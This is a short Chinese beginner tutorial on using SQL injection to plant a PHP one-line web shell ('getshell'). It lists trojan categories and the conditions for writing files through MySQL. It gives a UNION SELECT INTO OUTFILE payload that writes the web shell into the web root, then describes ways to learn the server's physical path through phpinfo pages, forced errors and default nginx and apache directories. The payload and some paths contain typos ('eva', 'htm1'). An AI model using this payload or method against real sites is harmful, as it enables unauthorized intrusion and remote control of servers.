【新手入门】SQL注入之getshell（木马）

木马介绍

木马其实就是一段程序，这个程序运行到目标主机上时，主要可以对目标进行远程控制、盗取信息等功能，一般不会破坏目标主机，当然，这也看黑客是否想要搞破坏。

按照功能分类:远控型、破坏型、流氓软件型、盗取信息型等等

按照连接方式分类:正向连接、反向连接、无连接等

按照功能大小分类:大马、小马、一句话木马

这里我们简单说一下php的一句话木马，然后通过sql注入将一句话木马写入目标服务器，再通过木马利用工具连接木马程序从而达到控制目标主机的效果。

通过注入点写入木马程序的前提条件

1.mysql开启了secure_file_priv=" "的配置.

2.知道了网站代码的真实物理路径.

3.物理路径具备写入权限.

4.最好是root用户，这个条件非必须，但是有最好.

通过注入点写入木马程序

' union select "<?php @eva($_POST[' jaden']);?>",2 into outfile "c:\\phpstudyPHPTutorial\\www\ljaden.php"+--+

获得后台真实物理路径的方法

1.收集站点敏感目录，比如phpinfo.php探针文件是否可以访问到

2.站点网址输入一些不存在的网址       或者加一些非法参数数据，让网站报错，看错误信息中是否存在路径信息

3.指纹信息收集
   nginx默认站点目录:/usr/share/nginx/htm1，配置文件路径:/etc/nginx/nginx.conf
   apache默认站点目录:/var/www/htm1

4.通过站点其他漏洞来获取配置信息、真实物理路径信息，比如如果发现远程命令执行漏洞，针对php的站点，直接执行一个phpinfo()函数，可以看到phpinfo.php所展示的各种信息等等。